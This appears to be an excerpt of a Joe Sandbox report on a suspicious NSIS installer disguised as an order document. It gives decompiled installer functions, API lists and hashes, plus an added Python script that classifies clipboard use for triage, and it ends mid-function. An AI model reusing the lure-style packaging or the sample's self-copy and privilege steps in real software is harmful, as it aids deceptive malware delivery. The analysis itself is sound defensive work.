                                                0x00000000
                                                0x004033a5
                                                0x004033a6
                                                0x004033ab
                                                0x004033ad
                                                0x004033b4
                                                0x004033bb
                                                0x004033bb
                                                0x004033b4
                                                0x004033cc
                                                0x004033df
                                                0x004033e0
                                                0x004033f5
                                                0x004033fa
                                                0x004033fe
                                                0x00403407
                                                0x0040340f
                                                0x00403416
                                                0x00403416
                                                0x0040340f
                                                0x00403422
                                                0x00403435
                                                0x00403436
                                                0x0040344b
                                                0x00403451
                                                0x00403455
                                                0x00000000
                                                0x0040347c
                                                0x0040347c
                                                0x00403481
                                                0x0040348a
                                                0x0040348f
                                                0x0040348f
                                                0x00000000
                                                0x0040348f
                                                0x00403455
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403387
                                                0x00403387
                                                0x00403388
                                                0x00403389
                                                0x00000000
                                                0x0040345d
                                                0x00403464
                                                0x0040346a
                                                0x0040346d
                                                0x0040346d
                                                0x0040346e
                                                0x00403471
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 0040329F
                                                • GetVersion.KERNEL32 ref: 004032A5
                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032F5
                                                • OleInitialize.OLE32(00000000), ref: 004032FC
                                                • SHGetFileInfoW.SHELL32(0079FF00,00000000,?,000002B4,00000000), ref: 00403318
                                                • GetCommandLineW.KERNEL32(Overcaustically Setup,NSIS Error), ref: 0040332D
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000), ref: 00403340
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000020), ref: 00403367
                                                  • Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                  • Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 004034A2
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004034B3
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004034BF
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004034D3
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004034DB
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004034EC
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 004034F4
                                                • DeleteFileW.KERNELBASE(1033), ref: 00403508
                                                  • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                • OleUninitialize.OLE32(?), ref: 004035D3
                                                • ExitProcess.KERNEL32 ref: 004035F5
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403608
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C), ref: 00403617
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 00403622
                                                • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000,?), ref: 0040362E
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 0040364A
                                                • DeleteFileW.KERNEL32(0079F700,0079F700,?,007A9000,?), ref: 004036A4
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,0079F700,00000001), ref: 004036B8
                                                • CloseHandle.KERNEL32(00000000,0079F700,0079F700,?,0079F700,00000000), ref: 004036E5
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403714
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040371B
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403730
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403753
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403778
                                                • ExitProcess.KERNEL32 ref: 0040379B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Low$NSIS Error$Overcaustically Setup$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                • API String ID: 3586999533-572620719
                                                • Opcode ID: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
                                                • Instruction ID: 4150c076459d7de682cc7567c7be7d1922bd71d2f30956bacb70bd1bfbc75f2d
                                                • Opcode Fuzzy Hash: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
                                                • Instruction Fuzzy Hash: A1D10770240310ABD710BF659D45B2B3AADEB81746F11843FF581B62D2DF7D8A418B6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 250 4052d0-4052eb 251 4052f1-4053b8 GetDlgItem * 3 call 40412b call 404a2e GetClientRect GetSystemMetrics SendMessageW * 2 250->251 252 40547a-405481 250->252 270 4053d6-4053d9 251->270 271 4053ba-4053d4 SendMessageW * 2 251->271 254 405483-4054a5 GetDlgItem CreateThread FindCloseChangeNotification 252->254 255 4054ab-4054b8 252->255 254->255 256 4054d6-4054e0 255->256 257 4054ba-4054c0 255->257 261 4054e2-4054e8 256->261 262 405536-40553a 256->262 259 4054c2-4054d1 ShowWindow * 2 call 40412b 257->259 260 4054fb-405504 call 40415d 257->260 259->256 274 405509-40550d 260->274 266 405510-405520 ShowWindow 261->266 267 4054ea-4054f6 call 4040cf 261->267 262->260 264 40553c-405542 262->264 264->260 272 405544-405557 SendMessageW 264->272 275 405530-405531 call 4040cf 266->275 276 405522-40552b call 405191 266->276 267->260 277 4053e9-405400 call 4040f6 270->277 278 4053db-4053e7 SendMessageW 270->278 271->270 279 405659-40565b 272->279 280 40555d-405588 CreatePopupMenu call 406054 AppendMenuW 272->280 275->262 276->275 289 405402-405416 ShowWindow 277->289 290 405436-405457 GetDlgItem SendMessageW 277->290 278->277 279->274 287 40558a-40559a GetWindowRect 280->287 288 40559d-4055b2 TrackPopupMenu 280->288 287->288 288->279 291 4055b8-4055cf 288->291 292 405425 289->292 293 405418-405423 ShowWindow 289->293 290->279 294 40545d-405475 SendMessageW * 2 290->294 295 4055d4-4055ef SendMessageW 291->295 296 40542b-405431 call 40412b 292->296 293->296 294->279 295->295 297 4055f1-405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 295->297 296->290 299 405616-40563d SendMessageW 297->299 299->299 300 40563f-405653 GlobalUnlock SetClipboardData CloseClipboard 299->300 300->279
                                                C-Code - Quality: 96%
                                                			E004052D0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				int _t101;
                                                				long _t104;
                                                				void* _t108;
                                                				intOrPtr _t119;
                                                				void* _t127;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x7a7a24; // 0x103b4
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					__eflags = _a8 - 0x405;
                                                					if(_a8 == 0x405) {
                                                						_t127 = CreateThread(0, 0, E00405264, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                						FindCloseChangeNotification(_t127); // executed
                                                					}
                                                					__eflags = _a8 - 0x111;
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						__eflags = _a8 - 0x404;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							__eflags = _a8 - 0x7b;
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							__eflags = _a12 - _t94;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							__eflags = _t95 - _t156;
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E00406054(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							__eflags = _a16 - 0xffffffff;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                							__eflags = _t101 - _t171;
                                                							if(_t101 == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x7a1f40;
                                                								_v44 = 0x1fff;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                									__eflags = _a4 - _t156;
                                                									_t171 = _t171 + _t104 + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
                                                									__eflags = _t156 - _a8;
                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						__eflags =  *0x7a7a0c - _t156; // 0x0
                                                						if(__eflags == 0) {
                                                							ShowWindow( *0x7a8a48, 8);
                                                							__eflags =  *0x7a8acc - _t156;
                                                							if( *0x7a8acc == _t156) {
                                                								_t119 =  *0x7a0f18; // 0x86533c
                                                								E00405191( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                							}
                                                							E004040CF(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x7a0710 = 2;
                                                						E004040CF(0x78);
                                                						goto L20;
                                                					} else {
                                                						__eflags = _a12 - 0x403;
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E0040415D(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x7a7a10, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E0040412B(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x7a8a50;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x7a7a10 = GetDlgItem(_a4, 0x403);
                                                				 *0x7a7a08 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x7a7a24 = _t134;
                                                				_v8 = _t134;
                                                				E0040412B( *0x7a7a10);
                                                				 *0x7a7a14 = E00404A2E(4);
                                                				 *0x7a7a2c = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E004040F6(_a4);
                                                				if(( *0x7a8a58 & 0x00000003) != 0) {
                                                					ShowWindow( *0x7a7a10, _t156); // executed
                                                					if(( *0x7a8a58 & 0x00000002) != 0) {
                                                						 *0x7a7a10 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E0040412B( *0x7a7a08);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x7a8a58 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}

                                                0x004052d8
                                                0x004052de
                                                0x004052e8
                                                0x004052eb
                                                0x0040547a
                                                0x00405481
                                                0x0040549e
                                                0x004054a5
                                                0x004054a5
                                                0x004054ab
                                                0x004054b8
                                                0x004054d6
                                                0x004054d8
                                                0x004054d9
                                                0x004054e0
                                                0x00405536
                                                0x00405536
                                                0x0040553a
                                                0x00000000
                                                0x00000000
                                                0x0040553c
                                                0x0040553f
                                                0x00405542
                                                0x00000000
                                                0x00000000
                                                0x0040554c
                                                0x00405552
                                                0x00405554
                                                0x00405557
                                                0x00405659
                                                0x00000000
                                                0x00405659
                                                0x00405566
                                                0x00405571
                                                0x0040557a
                                                0x00405581
                                                0x00405585
                                                0x00405588
                                                0x00405591
                                                0x00405597
                                                0x0040559a
                                                0x0040559a
                                                0x004055aa
                                                0x004055b0
                                                0x004055b2
                                                0x004055bb
                                                0x004055be
                                                0x004055c5
                                                0x004055cc
                                                0x004055d4
                                                0x004055d4
                                                0x004055e2
                                                0x004055e8
                                                0x004055eb
                                                0x004055eb
                                                0x004055f2
                                                0x004055f8
                                                0x00405604
                                                0x0040560b
                                                0x00405614
                                                0x00405616
                                                0x00405619
                                                0x00405628
                                                0x0040562b
                                                0x00405631
                                                0x00405632
                                                0x00405638
                                                0x00405639
                                                0x0040563a
                                                0x0040563a
                                                0x00405642
                                                0x0040564d
                                                0x00405653
                                                0x00405653
                                                0x00000000
                                                0x004055b2
                                                0x004054e2
                                                0x004054e8
                                                0x00405518
                                                0x0040551a
                                                0x00405520
                                                0x00405522
                                                0x0040552b
                                                0x0040552b
                                                0x00405531
                                                0x00000000
                                                0x00405531
                                                0x004054ec
                                                0x004054f6
                                                0x00000000
                                                0x004054ba
                                                0x004054ba
                                                0x004054c0
                                                0x004054fb
                                                0x00000000
                                                0x00405504
                                                0x004054c9
                                                0x004054ce
                                                0x004054d1
                                                0x00000000
                                                0x004054d1
                                                0x004054b8
                                                0x004052f1
                                                0x004052f5
                                                0x004052fd
                                                0x00405301
                                                0x00405304
                                                0x00405307
                                                0x0040530a
                                                0x0040530d
                                                0x0040530e
                                                0x0040530f
                                                0x00405328
                                                0x0040532b
                                                0x00405335
                                                0x00405344
                                                0x0040534c
                                                0x00405354
                                                0x00405359
                                                0x0040535c
                                                0x00405368
                                                0x00405371
                                                0x0040537a
                                                0x0040539c
                                                0x004053a2
                                                0x004053b3
                                                0x004053b8
                                                0x004053c6
                                                0x004053d4
                                                0x004053d4
                                                0x004053d9
                                                0x004053e7
                                                0x004053e7
                                                0x004053ec
                                                0x004053ef
                                                0x004053f4
                                                0x00405400
                                                0x00405409
                                                0x00405416
                                                0x00405425
                                                0x00405418
                                                0x0040541d
                                                0x0040541d
                                                0x00405431
                                                0x00405431
                                                0x00405445
                                                0x0040544e
                                                0x00405457
                                                0x00405467
                                                0x00405473
                                                0x00405473
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 0040532E
                                                • GetDlgItem.USER32 ref: 0040533D
                                                • GetClientRect.USER32 ref: 0040537A
                                                • GetSystemMetrics.USER32 ref: 00405381
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053A2
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B3
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C6
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D4
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053E7
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405409
                                                • ShowWindow.USER32(?,00000008), ref: 0040541D
                                                • GetDlgItem.USER32 ref: 0040543E
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040544E
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405467
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405473
                                                • GetDlgItem.USER32 ref: 0040534C
                                                  • Part of subcall function 0040412B: SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139
                                                • GetDlgItem.USER32 ref: 00405490
                                                • CreateThread.KERNELBASE ref: 0040549E
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A5
                                                • ShowWindow.USER32(00000000), ref: 004054C9
                                                • ShowWindow.USER32(000103B4,00000008), ref: 004054CE
                                                • ShowWindow.USER32(00000008), ref: 00405518
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554C
                                                • CreatePopupMenu.USER32 ref: 0040555D
                                                • AppendMenuW.USER32 ref: 00405571
                                                • GetWindowRect.USER32 ref: 00405591
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AA
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E2
                                                • OpenClipboard.USER32(00000000), ref: 004055F2
                                                • EmptyClipboard.USER32 ref: 004055F8
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405604
                                                • GlobalLock.KERNEL32 ref: 0040560E
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405622
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405642
                                                • SetClipboardData.USER32 ref: 0040564D
                                                • CloseClipboard.USER32 ref: 00405653
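The clipboard code in this function is a write, not a read: it walks a list-view control with LVM_GETITEMTEXTW (0x1073) to size the text, allocates a GMEM_MOVEABLE|GMEM_ZEROINIT (0x42) buffer for the joined rows plus CR/LF after each one, and publishes the buffer as CF_UNICODETEXT (0xd) after EmptyClipboard. That is the shape of an installer UI's "copy details" handler rather than clipboard harvesting, which is worth checking before weighting the clipboard signature in triage. The Python below is an added example, not code from the report or from the sample: it parses API lines in the format Joe Sandbox prints them, names the window messages passed to SendMessageW, decodes the GlobalAlloc flags and classifies the clipboard usage from the API set. The sample lines are excerpted from this function's list above; the regex and the classification rules are this example's own assumptions.

```python
"""Triage helpers for a Joe Sandbox "APIs" listing (added example, not report code).

Parses the per-function API lines, names the window messages passed to
SendMessageW, decodes GlobalAlloc flags, and decides whether the clipboard
APIs in the function read the clipboard, write it, or both.  The regex and
the classification rules are assumptions of this example, chosen to match
the report's text format.
"""
import re
from typing import Optional

# Win32 message IDs seen in this function (Windows SDK: LVM_FIRST = 0x1000,
# WM_USER = 0x400 for PBM_*, CCM_FIRST = 0x2000 for PBM_SETBKCOLOR).
MSG_NAMES = {
    0x1001: "LVM_SETBKCOLOR",
    0x1004: "LVM_GETITEMCOUNT",
    0x1024: "LVM_SETTEXTCOLOR",
    0x1026: "LVM_SETTEXTBKCOLOR",
    0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    0x1061: "LVM_INSERTCOLUMNW",
    0x1073: "LVM_GETITEMTEXTW",
    0x0401: "PBM_SETRANGE",
    0x0409: "PBM_SETBARCOLOR",
    0x2001: "PBM_SETBKCOLOR",
}
# GlobalAlloc flag bits (Windows SDK).
GMEM_FLAGS = {0x0002: "GMEM_MOVEABLE", 0x0040: "GMEM_ZEROINIT"}

# Constructed input: lines excerpted from the APIs list of the function above,
# including one "Part of subcall" entry that must not count as this function's own call.
SAMPLE_API_LINES = """\
• GetDlgItem.USER32 ref: 0040532E
• SendMessageW.USER32(?,00001061,00000000,?), ref: 004053A2
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B3
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C6
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040544E
  • Part of subcall function 0040412B: SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E2
• OpenClipboard.USER32(00000000), ref: 004055F2
• EmptyClipboard.USER32 ref: 004055F8
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405604
• SetClipboardData.USER32 ref: 0040564D
• CloseClipboard.USER32 ref: 00405653
"""

# One API line: optional subcall prefix, Api.MODULE, optional (args), ref: address.
_API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text: str) -> list[dict]:
    """Return one dict per recognised API line; unrecognised lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod").upper(),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub") is not None,
        })
    return calls


def _hex_arg(arg: str) -> Optional[int]:
    """Parse a resolved hex argument; '?' (unresolved at analysis time) gives None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def decode_messages(calls: list[dict]) -> list[tuple[int, str]]:
    """(call site, message name) for every SendMessageW whose uMsg was resolved."""
    out = []
    for c in calls:
        if c["api"] != "SendMessageW" or len(c["args"]) < 2:
            continue
        msg = _hex_arg(c["args"][1])
        if msg is not None:
            out.append((c["ref"], MSG_NAMES.get(msg, f"0x{msg:04x}")))
    return out


def decode_globalalloc_flags(calls: list[dict]) -> list[str]:
    """Flag names for the first GlobalAlloc call with a resolved uFlags argument."""
    for c in calls:
        if c["api"] == "GlobalAlloc" and c["args"]:
            v = _hex_arg(c["args"][0])
            if v is not None:
                return [name for bit, name in GMEM_FLAGS.items() if v & bit]
    return []


def classify_clipboard(calls: list[dict]) -> Optional[str]:
    """'write', 'read', 'read+write' or 'open-only'; None if the clipboard is never opened."""
    apis = {c["api"] for c in calls if not c["subcall"]}
    if "OpenClipboard" not in apis:
        return None
    writes = "SetClipboardData" in apis and "EmptyClipboard" in apis
    reads = "GetClipboardData" in apis
    if writes and reads:
        return "read+write"
    return "write" if writes else ("read" if reads else "open-only")


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for ref, name in decode_messages(calls):
        print(f"{ref:08x}  SendMessageW  {name}")
    print("GlobalAlloc flags:", "|".join(decode_globalalloc_flags(calls)))
    print("clipboard usage:", classify_clipboard(calls))
```

Run against the full APIs list of a function, the message names make the list-view and progress-bar setup readable at a glance, and a function that reports "write" with no GetClipboardData is copying its own UI text out rather than reading what the user put on the clipboard.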
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
                                                • Opcode ID: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
                                                • Instruction ID: d666eaf08a066d9579ddfae71cfc5fc92f0d71f62ebd549160e6baeed9b36ff9
                                                • Opcode Fuzzy Hash: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
                                                • Instruction Fuzzy Hash: A3B16A71900608FFDF11AF64DD89EAE3B79FB48355F00842AFA41BA1A0CB784A51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E10001B18() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				WCHAR* _v44;
                                                				signed int _v48;
                                                				void* _v52;
                                                				intOrPtr _v56;
                                                				WCHAR* _t199;
                                                				signed int _t202;
                                                				void* _t204;
                                                				void* _t206;
                                                				WCHAR* _t208;
